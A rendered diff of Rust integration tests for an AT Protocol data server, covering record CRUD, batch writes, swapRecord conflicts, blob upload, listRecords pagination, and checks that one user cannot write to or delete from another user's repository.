let (_bob_did, bob_jwt) = setup_new_user("bob-auth").await;
548
let post_payload = json!({
549
"repo": alice_did,
550
"collection": "app.bsky.feed.post",
551
"rkey": "unauthorized-post",
552
-
"record": {
553
-
"$type": "app.bsky.feed.post",
554
-
"text": "Bob trying to post as Alice",
555
-
"createdAt": Utc::now().to_rfc3339()
556
-
}
557
});
558
-
let res = client
559
-
.post(format!(
560
-
"{}/xrpc/com.atproto.repo.putRecord",
561
-
base_url().await
562
-
))
563
.bearer_auth(&bob_jwt)
564
.json(&post_payload)
565
.send()
566
.await
567
.expect("Failed to send request");
568
-
assert!(
569
-
res.status() == StatusCode::FORBIDDEN || res.status() == StatusCode::UNAUTHORIZED,
570
-
"Expected 403 or 401 when writing to another user's repo, got {}",
571
-
res.status()
572
-
);
573
-
}
574
-
575
-
#[tokio::test]
576
-
async fn test_authorization_cannot_delete_other_record() {
577
-
let client = client();
578
-
let (alice_did, alice_jwt) = setup_new_user("alice-del-auth").await;
579
-
let (_bob_did, bob_jwt) = setup_new_user("bob-del-auth").await;
580
-
let (post_uri, _) = create_post(&client, &alice_did, &alice_jwt, "Alice's post").await;
581
-
let post_rkey = post_uri.split('/').last().unwrap();
582
-
let delete_payload = json!({
583
-
"repo": alice_did,
584
-
"collection": "app.bsky.feed.post",
585
-
"rkey": post_rkey
586
-
});
587
-
let res = client
588
-
.post(format!(
589
-
"{}/xrpc/com.atproto.repo.deleteRecord",
590
-
base_url().await
591
-
))
592
.bearer_auth(&bob_jwt)
593
.json(&delete_payload)
594
.send()
595
.await
596
.expect("Failed to send request");
597
-
assert!(
598
-
res.status() == StatusCode::FORBIDDEN || res.status() == StatusCode::UNAUTHORIZED,
599
-
"Expected 403 or 401 when deleting another user's record, got {}",
600
-
res.status()
601
-
);
602
let get_res = client
603
-
.get(format!(
604
-
"{}/xrpc/com.atproto.repo.getRecord",
605
-
base_url().await
606
-
))
607
-
.query(&[
608
-
("repo", alice_did.as_str()),
609
-
("collection", "app.bsky.feed.post"),
610
-
("rkey", post_rkey),
611
-
])
612
.send()
613
.await
614
.expect("Failed to verify record exists");
615
-
assert_eq!(
616
-
get_res.status(),
617
-
StatusCode::OK,
618
-
"Record should still exist"
619
-
);
620
}
621
622
#[tokio::test]
623
-
async fn test_apply_writes_batch_lifecycle() {
624
let client = client();
625
let (did, jwt) = setup_new_user("apply-writes-batch").await;
626
let now = Utc::now().to_rfc3339();
627
let writes_payload = json!({
628
"repo": did,
629
"writes": [
630
-
{
631
-
"$type": "com.atproto.repo.applyWrites#create",
632
-
"collection": "app.bsky.feed.post",
633
-
"rkey": "batch-post-1",
634
-
"value": {
635
-
"$type": "app.bsky.feed.post",
636
-
"text": "First batch post",
637
-
"createdAt": now
638
-
}
639
-
},
640
-
{
641
-
"$type": "com.atproto.repo.applyWrites#create",
642
-
"collection": "app.bsky.feed.post",
643
-
"rkey": "batch-post-2",
644
-
"value": {
645
-
"$type": "app.bsky.feed.post",
646
-
"text": "Second batch post",
647
-
"createdAt": now
648
-
}
649
-
},
650
-
{
651
-
"$type": "com.atproto.repo.applyWrites#create",
652
-
"collection": "app.bsky.actor.profile",
653
-
"rkey": "self",
654
-
"value": {
655
-
"$type": "app.bsky.actor.profile",
656
-
"displayName": "Batch User"
657
-
}
658
-
}
659
]
660
});
661
let apply_res = client
662
-
.post(format!(
663
-
"{}/xrpc/com.atproto.repo.applyWrites",
664
-
base_url().await
665
-
))
666
.bearer_auth(&jwt)
667
.json(&writes_payload)
668
.send()
···
670
.expect("Failed to apply writes");
671
assert_eq!(apply_res.status(), StatusCode::OK);
672
let get_post1 = client
673
-
.get(format!(
674
-
"{}/xrpc/com.atproto.repo.getRecord",
675
-
base_url().await
676
-
))
677
-
.query(&[
678
-
("repo", did.as_str()),
679
-
("collection", "app.bsky.feed.post"),
680
-
("rkey", "batch-post-1"),
681
-
])
682
-
.send()
683
-
.await
684
-
.expect("Failed to get post 1");
685
assert_eq!(get_post1.status(), StatusCode::OK);
686
let post1_body: Value = get_post1.json().await.unwrap();
687
assert_eq!(post1_body["value"]["text"], "First batch post");
688
let get_post2 = client
689
-
.get(format!(
690
-
"{}/xrpc/com.atproto.repo.getRecord",
691
-
base_url().await
692
-
))
693
-
.query(&[
694
-
("repo", did.as_str()),
695
-
("collection", "app.bsky.feed.post"),
696
-
("rkey", "batch-post-2"),
697
-
])
698
-
.send()
699
-
.await
700
-
.expect("Failed to get post 2");
701
assert_eq!(get_post2.status(), StatusCode::OK);
702
let get_profile = client
703
-
.get(format!(
704
-
"{}/xrpc/com.atproto.repo.getRecord",
705
-
base_url().await
706
-
))
707
-
.query(&[
708
-
("repo", did.as_str()),
709
-
("collection", "app.bsky.actor.profile"),
710
-
("rkey", "self"),
711
-
])
712
-
.send()
713
-
.await
714
-
.expect("Failed to get profile");
715
-
assert_eq!(get_profile.status(), StatusCode::OK);
716
let profile_body: Value = get_profile.json().await.unwrap();
717
assert_eq!(profile_body["value"]["displayName"], "Batch User");
718
let update_writes = json!({
719
"repo": did,
720
"writes": [
721
-
{
722
-
"$type": "com.atproto.repo.applyWrites#update",
723
-
"collection": "app.bsky.actor.profile",
724
-
"rkey": "self",
725
-
"value": {
726
-
"$type": "app.bsky.actor.profile",
727
-
"displayName": "Updated Batch User"
728
-
}
729
-
},
730
-
{
731
-
"$type": "com.atproto.repo.applyWrites#delete",
732
-
"collection": "app.bsky.feed.post",
733
-
"rkey": "batch-post-1"
734
-
}
735
]
736
});
737
let update_res = client
738
-
.post(format!(
739
-
"{}/xrpc/com.atproto.repo.applyWrites",
740
-
base_url().await
741
-
))
742
.bearer_auth(&jwt)
743
.json(&update_writes)
744
.send()
···
746
.expect("Failed to apply update writes");
747
assert_eq!(update_res.status(), StatusCode::OK);
748
let get_updated_profile = client
749
-
.get(format!(
750
-
"{}/xrpc/com.atproto.repo.getRecord",
751
-
base_url().await
752
-
))
753
-
.query(&[
754
-
("repo", did.as_str()),
755
-
("collection", "app.bsky.actor.profile"),
756
-
("rkey", "self"),
757
-
])
758
-
.send()
759
-
.await
760
-
.expect("Failed to get updated profile");
761
let updated_profile: Value = get_updated_profile.json().await.unwrap();
762
-
assert_eq!(
763
-
updated_profile["value"]["displayName"],
764
-
"Updated Batch User"
765
-
);
766
let get_deleted_post = client
767
-
.get(format!(
768
-
"{}/xrpc/com.atproto.repo.getRecord",
769
-
base_url().await
770
-
))
771
-
.query(&[
772
-
("repo", did.as_str()),
773
-
("collection", "app.bsky.feed.post"),
774
-
("rkey", "batch-post-1"),
775
-
])
776
-
.send()
777
-
.await
778
-
.expect("Failed to check deleted post");
779
-
assert_eq!(
780
-
get_deleted_post.status(),
781
-
StatusCode::NOT_FOUND,
782
-
"Batch-deleted post should be gone"
783
-
);
784
}
785
786
-
async fn create_post_with_rkey(
787
-
client: &reqwest::Client,
788
-
did: &str,
789
-
jwt: &str,
790
-
rkey: &str,
791
-
text: &str,
792
-
) -> (String, String) {
793
let payload = json!({
794
-
"repo": did,
795
-
"collection": "app.bsky.feed.post",
796
-
"rkey": rkey,
797
-
"record": {
798
-
"$type": "app.bsky.feed.post",
799
-
"text": text,
800
-
"createdAt": Utc::now().to_rfc3339()
801
-
}
802
});
803
let res = client
804
-
.post(format!(
805
-
"{}/xrpc/com.atproto.repo.putRecord",
806
-
base_url().await
807
-
))
808
.bearer_auth(jwt)
809
.json(&payload)
810
.send()
···
812
.expect("Failed to create record");
813
assert_eq!(res.status(), StatusCode::OK);
814
let body: Value = res.json().await.unwrap();
815
-
(
816
-
body["uri"].as_str().unwrap().to_string(),
817
-
body["cid"].as_str().unwrap().to_string(),
818
-
)
819
}
820
821
#[tokio::test]
822
-
async fn test_list_records_default_order() {
823
let client = client();
824
-
let (did, jwt) = setup_new_user("list-default-order").await;
825
-
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First post").await;
826
-
tokio::time::sleep(Duration::from_millis(50)).await;
827
-
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second post").await;
828
-
tokio::time::sleep(Duration::from_millis(50)).await;
829
-
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third post").await;
830
-
let res = client
831
-
.get(format!(
832
-
"{}/xrpc/com.atproto.repo.listRecords",
833
-
base_url().await
834
-
))
835
-
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post")])
836
-
.send()
837
-
.await
838
-
.expect("Failed to list records");
839
-
assert_eq!(res.status(), StatusCode::OK);
840
-
let body: Value = res.json().await.unwrap();
841
-
let records = body["records"].as_array().unwrap();
842
-
assert_eq!(records.len(), 3);
843
-
let rkeys: Vec<&str> = records
844
-
.iter()
845
-
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
846
-
.collect();
847
-
assert_eq!(
848
-
rkeys,
849
-
vec!["cccc", "bbbb", "aaaa"],
850
-
"Default order should be DESC (newest first)"
851
-
);
852
-
}
853
-
854
-
#[tokio::test]
855
-
async fn test_list_records_reverse_true() {
856
-
let client = client();
857
-
let (did, jwt) = setup_new_user("list-reverse").await;
858
-
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First post").await;
859
-
tokio::time::sleep(Duration::from_millis(50)).await;
860
-
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second post").await;
861
-
tokio::time::sleep(Duration::from_millis(50)).await;
862
-
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third post").await;
863
-
let res = client
864
-
.get(format!(
865
-
"{}/xrpc/com.atproto.repo.listRecords",
866
-
base_url().await
867
-
))
868
-
.query(&[
869
-
("repo", did.as_str()),
870
-
("collection", "app.bsky.feed.post"),
871
-
("reverse", "true"),
872
-
])
873
-
.send()
874
-
.await
875
-
.expect("Failed to list records");
876
-
assert_eq!(res.status(), StatusCode::OK);
877
-
let body: Value = res.json().await.unwrap();
878
-
let records = body["records"].as_array().unwrap();
879
-
let rkeys: Vec<&str> = records
880
-
.iter()
881
-
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
882
-
.collect();
883
-
assert_eq!(
884
-
rkeys,
885
-
vec!["aaaa", "bbbb", "cccc"],
886
-
"reverse=true should give ASC order (oldest first)"
887
-
);
888
-
}
889
-
890
-
#[tokio::test]
891
-
async fn test_list_records_cursor_pagination() {
892
-
let client = client();
893
-
let (did, jwt) = setup_new_user("list-cursor").await;
894
for i in 0..5 {
895
-
create_post_with_rkey(
896
-
&client,
897
-
&did,
898
-
&jwt,
899
-
&format!("post{:02}", i),
900
-
&format!("Post {}", i),
901
-
)
902
-
.await;
903
tokio::time::sleep(Duration::from_millis(50)).await;
904
}
905
let res = client
906
-
.get(format!(
907
-
"{}/xrpc/com.atproto.repo.listRecords",
908
-
base_url().await
909
-
))
910
-
.query(&[
911
-
("repo", did.as_str()),
912
-
("collection", "app.bsky.feed.post"),
913
-
("limit", "2"),
914
-
])
915
-
.send()
916
-
.await
917
-
.expect("Failed to list records");
918
-
assert_eq!(res.status(), StatusCode::OK);
919
-
let body: Value = res.json().await.unwrap();
920
-
let records = body["records"].as_array().unwrap();
921
-
assert_eq!(records.len(), 2);
922
-
let cursor = body["cursor"]
923
-
.as_str()
924
-
.expect("Should have cursor with more records");
925
-
let res2 = client
926
-
.get(format!(
927
-
"{}/xrpc/com.atproto.repo.listRecords",
928
-
base_url().await
929
-
))
930
-
.query(&[
931
-
("repo", did.as_str()),
932
-
("collection", "app.bsky.feed.post"),
933
-
("limit", "2"),
934
-
("cursor", cursor),
935
-
])
936
-
.send()
937
-
.await
938
-
.expect("Failed to list records with cursor");
939
-
assert_eq!(res2.status(), StatusCode::OK);
940
-
let body2: Value = res2.json().await.unwrap();
941
-
let records2 = body2["records"].as_array().unwrap();
942
-
assert_eq!(records2.len(), 2);
943
-
let all_uris: Vec<&str> = records
944
-
.iter()
945
-
.chain(records2.iter())
946
-
.map(|r| r["uri"].as_str().unwrap())
947
-
.collect();
948
-
let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect();
949
-
assert_eq!(
950
-
all_uris.len(),
951
-
unique_uris.len(),
952
-
"Cursor pagination should not repeat records"
953
-
);
954
-
}
955
-
956
-
#[tokio::test]
957
-
async fn test_list_records_rkey_start() {
958
-
let client = client();
959
-
let (did, jwt) = setup_new_user("list-rkey-start").await;
960
-
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First").await;
961
-
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second").await;
962
-
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third").await;
963
-
create_post_with_rkey(&client, &did, &jwt, "dddd", "Fourth").await;
964
-
let res = client
965
-
.get(format!(
966
-
"{}/xrpc/com.atproto.repo.listRecords",
967
-
base_url().await
968
-
))
969
-
.query(&[
970
-
("repo", did.as_str()),
971
-
("collection", "app.bsky.feed.post"),
972
-
("rkeyStart", "bbbb"),
973
-
("reverse", "true"),
974
-
])
975
-
.send()
976
-
.await
977
-
.expect("Failed to list records");
978
-
assert_eq!(res.status(), StatusCode::OK);
979
-
let body: Value = res.json().await.unwrap();
980
-
let records = body["records"].as_array().unwrap();
981
-
let rkeys: Vec<&str> = records
982
-
.iter()
983
-
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
984
-
.collect();
985
-
for rkey in &rkeys {
986
-
assert!(*rkey >= "bbbb", "rkeyStart should filter records >= start");
987
-
}
988
-
}
989
-
990
-
#[tokio::test]
991
-
async fn test_list_records_rkey_end() {
992
-
let client = client();
993
-
let (did, jwt) = setup_new_user("list-rkey-end").await;
994
-
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First").await;
995
-
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second").await;
996
-
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third").await;
997
-
create_post_with_rkey(&client, &did, &jwt, "dddd", "Fourth").await;
998
-
let res = client
999
-
.get(format!(
1000
-
"{}/xrpc/com.atproto.repo.listRecords",
1001
-
base_url().await
1002
-
))
1003
-
.query(&[
1004
-
("repo", did.as_str()),
1005
-
("collection", "app.bsky.feed.post"),
1006
-
("rkeyEnd", "cccc"),
1007
-
("reverse", "true"),
1008
-
])
1009
-
.send()
1010
-
.await
1011
-
.expect("Failed to list records");
1012
-
assert_eq!(res.status(), StatusCode::OK);
1013
-
let body: Value = res.json().await.unwrap();
1014
-
let records = body["records"].as_array().unwrap();
1015
-
let rkeys: Vec<&str> = records
1016
-
.iter()
1017
-
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
1018
-
.collect();
1019
-
for rkey in &rkeys {
1020
-
assert!(*rkey <= "cccc", "rkeyEnd should filter records <= end");
1021
-
}
1022
-
}
1023
-
1024
-
#[tokio::test]
1025
-
async fn test_list_records_rkey_range() {
1026
-
let client = client();
1027
-
let (did, jwt) = setup_new_user("list-rkey-range").await;
1028
-
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First").await;
1029
-
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second").await;
1030
-
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third").await;
1031
-
create_post_with_rkey(&client, &did, &jwt, "dddd", "Fourth").await;
1032
-
create_post_with_rkey(&client, &did, &jwt, "eeee", "Fifth").await;
1033
-
let res = client
1034
-
.get(format!(
1035
-
"{}/xrpc/com.atproto.repo.listRecords",
1036
-
base_url().await
1037
-
))
1038
-
.query(&[
1039
-
("repo", did.as_str()),
1040
-
("collection", "app.bsky.feed.post"),
1041
-
("rkeyStart", "bbbb"),
1042
-
("rkeyEnd", "dddd"),
1043
-
("reverse", "true"),
1044
-
])
1045
-
.send()
1046
-
.await
1047
-
.expect("Failed to list records");
1048
-
assert_eq!(res.status(), StatusCode::OK);
1049
-
let body: Value = res.json().await.unwrap();
1050
-
let records = body["records"].as_array().unwrap();
1051
-
let rkeys: Vec<&str> = records
1052
-
.iter()
1053
-
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
1054
-
.collect();
1055
-
for rkey in &rkeys {
1056
-
assert!(
1057
-
*rkey >= "bbbb" && *rkey <= "dddd",
1058
-
"Range should be inclusive, got {}",
1059
-
rkey
1060
-
);
1061
-
}
1062
-
assert!(
1063
-
!rkeys.is_empty(),
1064
-
"Should have at least some records in range"
1065
-
);
1066
-
}
1067
-
1068
-
#[tokio::test]
1069
-
async fn test_list_records_limit_clamping_max() {
1070
-
let client = client();
1071
-
let (did, jwt) = setup_new_user("list-limit-max").await;
1072
-
for i in 0..5 {
1073
-
create_post_with_rkey(
1074
-
&client,
1075
-
&did,
1076
-
&jwt,
1077
-
&format!("post{:02}", i),
1078
-
&format!("Post {}", i),
1079
-
)
1080
-
.await;
1081
-
}
1082
-
let res = client
1083
-
.get(format!(
1084
-
"{}/xrpc/com.atproto.repo.listRecords",
1085
-
base_url().await
1086
-
))
1087
-
.query(&[
1088
-
("repo", did.as_str()),
1089
-
("collection", "app.bsky.feed.post"),
1090
-
("limit", "1000"),
1091
-
])
1092
-
.send()
1093
-
.await
1094
-
.expect("Failed to list records");
1095
-
assert_eq!(res.status(), StatusCode::OK);
1096
-
let body: Value = res.json().await.unwrap();
1097
-
let records = body["records"].as_array().unwrap();
1098
-
assert!(records.len() <= 100, "Limit should be clamped to max 100");
1099
-
}
1100
-
1101
-
#[tokio::test]
1102
-
async fn test_list_records_limit_clamping_min() {
1103
-
let client = client();
1104
-
let (did, jwt) = setup_new_user("list-limit-min").await;
1105
-
create_post_with_rkey(&client, &did, &jwt, "aaaa", "Post").await;
1106
-
let res = client
1107
-
.get(format!(
1108
-
"{}/xrpc/com.atproto.repo.listRecords",
1109
-
base_url().await
1110
-
))
1111
-
.query(&[
1112
-
("repo", did.as_str()),
1113
-
("collection", "app.bsky.feed.post"),
1114
-
("limit", "0"),
1115
-
])
1116
-
.send()
1117
-
.await
1118
-
.expect("Failed to list records");
1119
-
assert_eq!(res.status(), StatusCode::OK);
1120
-
let body: Value = res.json().await.unwrap();
1121
-
let records = body["records"].as_array().unwrap();
1122
-
assert!(records.len() >= 1, "Limit should be clamped to min 1");
1123
-
}
1124
-
1125
-
#[tokio::test]
1126
-
async fn test_list_records_empty_collection() {
1127
-
let client = client();
1128
-
let (did, _jwt) = setup_new_user("list-empty").await;
1129
-
let res = client
1130
-
.get(format!(
1131
-
"{}/xrpc/com.atproto.repo.listRecords",
1132
-
base_url().await
1133
-
))
1134
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post")])
1135
-
.send()
1136
-
.await
1137
-
.expect("Failed to list records");
1138
-
assert_eq!(res.status(), StatusCode::OK);
1139
-
let body: Value = res.json().await.unwrap();
1140
-
let records = body["records"].as_array().unwrap();
1141
-
assert!(
1142
-
records.is_empty(),
1143
-
"Empty collection should return empty array"
1144
-
);
1145
-
assert!(
1146
-
body["cursor"].is_null(),
1147
-
"Empty collection should have no cursor"
1148
-
);
1149
-
}
1150
-
1151
-
#[tokio::test]
1152
-
async fn test_list_records_exact_limit() {
1153
-
let client = client();
1154
-
let (did, jwt) = setup_new_user("list-exact-limit").await;
1155
-
for i in 0..10 {
1156
-
create_post_with_rkey(
1157
-
&client,
1158
-
&did,
1159
-
&jwt,
1160
-
&format!("post{:02}", i),
1161
-
&format!("Post {}", i),
1162
-
)
1163
-
.await;
1164
-
}
1165
-
let res = client
1166
-
.get(format!(
1167
-
"{}/xrpc/com.atproto.repo.listRecords",
1168
-
base_url().await
1169
-
))
1170
-
.query(&[
1171
-
("repo", did.as_str()),
1172
-
("collection", "app.bsky.feed.post"),
1173
-
("limit", "5"),
1174
-
])
1175
-
.send()
1176
-
.await
1177
-
.expect("Failed to list records");
1178
-
assert_eq!(res.status(), StatusCode::OK);
1179
-
let body: Value = res.json().await.unwrap();
1180
-
let records = body["records"].as_array().unwrap();
1181
-
assert_eq!(
1182
-
records.len(),
1183
-
5,
1184
-
"Should return exactly 5 records when limit=5"
1185
-
);
1186
-
}
1187
-
1188
-
#[tokio::test]
1189
-
async fn test_list_records_cursor_exhaustion() {
1190
-
let client = client();
1191
-
let (did, jwt) = setup_new_user("list-cursor-exhaust").await;
1192
-
for i in 0..3 {
1193
-
create_post_with_rkey(
1194
-
&client,
1195
-
&did,
1196
-
&jwt,
1197
-
&format!("post{:02}", i),
1198
-
&format!("Post {}", i),
1199
-
)
1200
-
.await;
1201
-
}
1202
-
let res = client
1203
-
.get(format!(
1204
-
"{}/xrpc/com.atproto.repo.listRecords",
1205
-
base_url().await
1206
-
))
1207
-
.query(&[
1208
-
("repo", did.as_str()),
1209
-
("collection", "app.bsky.feed.post"),
1210
-
("limit", "10"),
1211
-
])
1212
-
.send()
1213
-
.await
1214
-
.expect("Failed to list records");
1215
-
assert_eq!(res.status(), StatusCode::OK);
1216
-
let body: Value = res.json().await.unwrap();
1217
-
let records = body["records"].as_array().unwrap();
1218
-
assert_eq!(records.len(), 3);
1219
-
}
1220
-
1221
-
#[tokio::test]
1222
-
async fn test_list_records_repo_not_found() {
1223
-
let client = client();
1224
-
let res = client
1225
-
.get(format!(
1226
-
"{}/xrpc/com.atproto.repo.listRecords",
1227
-
base_url().await
1228
-
))
1229
-
.query(&[
1230
-
("repo", "did:plc:nonexistent12345"),
1231
-
("collection", "app.bsky.feed.post"),
1232
-
])
1233
-
.send()
1234
-
.await
1235
-
.expect("Failed to list records");
1236
-
assert_eq!(res.status(), StatusCode::NOT_FOUND);
1237
-
}
1238
-
1239
-
#[tokio::test]
1240
-
async fn test_list_records_includes_cid() {
1241
-
let client = client();
1242
-
let (did, jwt) = setup_new_user("list-includes-cid").await;
1243
-
create_post_with_rkey(&client, &did, &jwt, "test", "Test post").await;
1244
-
let res = client
1245
-
.get(format!(
1246
-
"{}/xrpc/com.atproto.repo.listRecords",
1247
-
base_url().await
1248
-
))
1249
-
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post")])
1250
-
.send()
1251
-
.await
1252
-
.expect("Failed to list records");
1253
assert_eq!(res.status(), StatusCode::OK);
1254
let body: Value = res.json().await.unwrap();
1255
let records = body["records"].as_array().unwrap();
1256
for record in records {
1257
-
assert!(record["uri"].is_string(), "Record should have uri");
1258
-
assert!(record["cid"].is_string(), "Record should have cid");
1259
-
assert!(record["value"].is_object(), "Record should have value");
1260
-
let cid = record["cid"].as_str().unwrap();
1261
-
assert!(cid.starts_with("bafy"), "CID should be valid");
1262
-
}
1263
-
}
1264
-
1265
-
#[tokio::test]
1266
-
async fn test_list_records_cursor_with_reverse() {
1267
-
let client = client();
1268
-
let (did, jwt) = setup_new_user("list-cursor-reverse").await;
1269
-
for i in 0..5 {
1270
-
create_post_with_rkey(
1271
-
&client,
1272
-
&did,
1273
-
&jwt,
1274
-
&format!("post{:02}", i),
1275
-
&format!("Post {}", i),
1276
-
)
1277
-
.await;
1278
}
1279
-
let res = client
1280
-
.get(format!(
1281
-
"{}/xrpc/com.atproto.repo.listRecords",
1282
-
base_url().await
1283
-
))
1284
-
.query(&[
1285
-
("repo", did.as_str()),
1286
-
("collection", "app.bsky.feed.post"),
1287
-
("limit", "2"),
1288
-
("reverse", "true"),
1289
-
])
1290
-
.send()
1291
-
.await
1292
-
.expect("Failed to list records");
1293
-
assert_eq!(res.status(), StatusCode::OK);
1294
-
let body: Value = res.json().await.unwrap();
1295
-
let records = body["records"].as_array().unwrap();
1296
-
let first_rkeys: Vec<&str> = records
1297
-
.iter()
1298
-
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
1299
-
.collect();
1300
-
assert_eq!(
1301
-
first_rkeys,
1302
-
vec!["post00", "post01"],
1303
-
"First page with reverse should start from oldest"
1304
-
);
1305
-
if let Some(cursor) = body["cursor"].as_str() {
1306
-
let res2 = client
1307
-
.get(format!(
1308
-
"{}/xrpc/com.atproto.repo.listRecords",
1309
-
base_url().await
1310
-
))
1311
-
.query(&[
1312
-
("repo", did.as_str()),
1313
-
("collection", "app.bsky.feed.post"),
1314
-
("limit", "2"),
1315
-
("reverse", "true"),
1316
-
("cursor", cursor),
1317
-
])
1318
-
.send()
1319
-
.await
1320
-
.expect("Failed to list records with cursor");
1321
-
let body2: Value = res2.json().await.unwrap();
1322
-
let records2 = body2["records"].as_array().unwrap();
1323
-
let second_rkeys: Vec<&str> = records2
1324
-
.iter()
1325
-
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
1326
-
.collect();
1327
-
assert_eq!(
1328
-
second_rkeys,
1329
-
vec!["post02", "post03"],
1330
-
"Second page should continue in ASC order"
1331
-
);
1332
}
1333
}
···
8
use std::time::Duration;
9
10
#[tokio::test]
11
+
async fn test_record_crud_lifecycle() {
12
let client = client();
13
let (did, jwt) = setup_new_user("lifecycle-crud").await;
14
let collection = "app.bsky.feed.post";
···
26
}
27
});
28
let create_res = client
29
+
.post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await))
30
.bearer_auth(&jwt)
31
.json(&create_payload)
32
.send()
33
.await
34
.expect("Failed to send create request");
35
+
assert_eq!(create_res.status(), StatusCode::OK, "Failed to create record");
36
+
let create_body: Value = create_res.json().await.expect("create response was not JSON");
37
let uri = create_body["uri"].as_str().unwrap();
38
+
let initial_cid = create_body["cid"].as_str().unwrap().to_string();
39
+
let params = [("repo", did.as_str()), ("collection", collection), ("rkey", &rkey)];
40
let get_res = client
41
+
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
42
.query(¶ms)
43
.send()
44
.await
45
.expect("Failed to send get request");
46
+
assert_eq!(get_res.status(), StatusCode::OK, "Failed to get record after create");
47
let get_body: Value = get_res.json().await.expect("get response was not JSON");
48
assert_eq!(get_body["uri"], uri);
49
assert_eq!(get_body["value"]["text"], original_text);
···
52
"repo": did,
53
"collection": collection,
54
"rkey": rkey,
55
+
"record": { "$type": collection, "text": updated_text, "createdAt": now },
56
+
"swapRecord": initial_cid
57
});
58
let update_res = client
59
+
.post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await))
60
.bearer_auth(&jwt)
61
.json(&update_payload)
62
.send()
63
.await
64
.expect("Failed to send update request");
65
+
assert_eq!(update_res.status(), StatusCode::OK, "Failed to update record");
66
+
let update_body: Value = update_res.json().await.expect("update response was not JSON");
67
+
let updated_cid = update_body["cid"].as_str().unwrap().to_string();
68
let get_updated_res = client
69
+
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
70
.query(¶ms)
71
.send()
72
.await
73
.expect("Failed to send get-after-update request");
74
+
let get_updated_body: Value = get_updated_res.json().await.expect("get-updated response was not JSON");
75
+
assert_eq!(get_updated_body["value"]["text"], updated_text, "Text was not updated");
76
+
let stale_update_payload = json!({
77
+
"repo": did,
78
+
"collection": collection,
79
+
"rkey": rkey,
80
+
"record": { "$type": collection, "text": "Stale update", "createdAt": now },
81
+
"swapRecord": initial_cid
82
+
});
83
+
let stale_res = client
84
+
.post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await))
85
+
.bearer_auth(&jwt)
86
+
.json(&stale_update_payload)
87
+
.send()
88
.await
89
+
.expect("Failed to send stale update");
90
+
assert_eq!(stale_res.status(), StatusCode::CONFLICT, "Stale update should cause 409");
91
+
let good_update_payload = json!({
92
"repo": did,
93
"collection": collection,
94
+
"rkey": rkey,
95
+
"record": { "$type": collection, "text": "Good update", "createdAt": now },
96
+
"swapRecord": updated_cid
97
});
98
+
let good_res = client
99
+
.post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await))
100
+
.bearer_auth(&jwt)
101
+
.json(&good_update_payload)
102
+
.send()
103
+
.await
104
+
.expect("Failed to send good update");
105
+
assert_eq!(good_res.status(), StatusCode::OK, "Good update should succeed");
106
+
let delete_payload = json!({ "repo": did, "collection": collection, "rkey": rkey });
107
let delete_res = client
108
+
.post(format!("{}/xrpc/com.atproto.repo.deleteRecord", base_url().await))
109
.bearer_auth(&jwt)
110
.json(&delete_payload)
111
.send()
112
.await
113
.expect("Failed to send delete request");
114
+
assert_eq!(delete_res.status(), StatusCode::OK, "Failed to delete record");
115
let get_deleted_res = client
116
+
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
117
.query(¶ms)
118
.send()
119
.await
120
.expect("Failed to send get-after-delete request");
121
+
assert_eq!(get_deleted_res.status(), StatusCode::NOT_FOUND, "Record should be deleted");
122
}
123
124
#[tokio::test]
125
+
async fn test_profile_with_blob_lifecycle() {
126
let client = client();
127
+
let (did, jwt) = setup_new_user("profile-blob").await;
128
+
let blob_data = b"This is test blob data for a profile avatar";
129
+
let upload_res = client
130
+
.post(format!("{}/xrpc/com.atproto.repo.uploadBlob", base_url().await))
131
+
.header(header::CONTENT_TYPE, "text/plain")
132
+
.bearer_auth(&jwt)
133
+
.body(blob_data.to_vec())
134
.send()
135
.await
136
+
.expect("Failed to upload blob");
137
+
assert_eq!(upload_res.status(), StatusCode::OK);
138
+
let upload_body: Value = upload_res.json().await.unwrap();
139
+
let blob_ref = upload_body["blob"].clone();
140
let profile_payload = json!({
141
"repo": did,
142
"collection": "app.bsky.actor.profile",
···
144
"record": {
145
"$type": "app.bsky.actor.profile",
146
"displayName": "Test User",
147
+
"description": "A test profile for lifecycle testing",
148
+
"avatar": blob_ref
149
}
150
});
151
let create_res = client
152
+
.post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await))
153
.bearer_auth(&jwt)
154
.json(&profile_payload)
155
.send()
156
.await
157
.expect("Failed to create profile");
158
+
assert_eq!(create_res.status(), StatusCode::OK, "Failed to create profile");
159
let create_body: Value = create_res.json().await.unwrap();
160
let initial_cid = create_body["cid"].as_str().unwrap().to_string();
161
let get_res = client
162
+
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
163
+
.query(&[("repo", did.as_str()), ("collection", "app.bsky.actor.profile"), ("rkey", "self")])
164
.send()
165
.await
166
.expect("Failed to get profile");
167
